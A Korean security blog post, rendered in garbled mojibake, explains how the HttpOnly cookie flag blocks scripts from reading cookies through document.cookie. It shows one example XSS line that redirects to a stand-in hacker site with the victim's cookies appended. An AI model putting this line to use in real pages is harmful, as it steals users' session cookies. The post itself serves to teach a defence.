728x90
๋ฐ์ํ
ํด์ปค๋ ์๋์ฒ๋ผ document.cookie๋ฅผ ํตํด ์ค์ํ ์ฟ ํค ์ ๋ณด๋ค์ ์์งํ๋ ๊ฒ ์ผ๋ฐ์
location.href = 'http://ํด์ปค์ฌ์ดํธ/?cookies=' + document.cookie;
์๋ฒ๊ฐ ํด๋ผ์ด์ธํธ์๊ฒ ์ฟ ํค ๊ฐ์ ์ง์ ํ ๋์ HttpOnly๋ผ๋ ์ต์ ์ ์ถ๊ฐ์์ผ์ฃผ๋ฉด,
(HttpOnly๊ฐ Http๋ง ํ์ฉํ๊ณ , Https๋ ํ์ฉํ์ง ์๋๋ค ์ด๊ฒ ์๋๋ค..)
ํด๋ผ์ด์ธํธ๊ฐ document.cookie๋ฅผ ์๋ฌด๋ฆฌ ์ถ๋ ฅํด ๋ณด์๋ ํด๋น ์ฟ ํค์ ๋ํ ์ ๋ณด๋ ์ถ๋ ฅ์ด ๋์ง ์๋๋ค.
Set-Cookie: ์ฟ ํค๋ช
=์ฟ ํค๊ฐ; path=/; HttpOnly
HttpOnly ์ค์ ์ ํ ์ฟ ํค๋ ๋ธ๋ผ์ฐ์ ๊ฐ ์ ๊ทผ์ ํ ์ ์๋๋ก ๋๋ฒ๋ฆฐ ๊ฒ.
๋น์ฐํ ์๋ฒ์๊ฒ GET, POST ์์ฒญ๋ฑ์ ํ ๋์๋ HttpOnly ์ค์ ๋ ์ฟ ํค๋ ์ ์ ๋ฌ๋๋ค.
์ฐธ๊ณ :
728x90
๋ฐ์ํ
'๐์ ๋ณด๋ณด์ > ์น ๋ณด์' ์นดํ ๊ณ ๋ฆฌ์ ๋ค๋ฅธ ๊ธ
์น ํดํน - sqlmap (0) | 2022.07.24 |
---|---|
์น ํดํน - ์น ํจํท ์ ์ก ํ์ฅ ํ๋ก๊ทธ๋จ (0) | 2021.12.09 |
์น ํดํน - NoSQL Injection ์กฐ๊ฑด ํํ์ (0) | 2021.12.09 |
์น ํดํน - ํฌ๋กฌ ์คํ์ด์จ์ด ํ์ฅ ํ๋ก๊ทธ๋จ , Bad Extension (0) | 2021.12.08 |
[WEB-HACKING] HTML ์ด๋ฒคํธ ์์ฑ ๋ชจ์ & XSS ์์ฉ (0) | 2021.11.15 |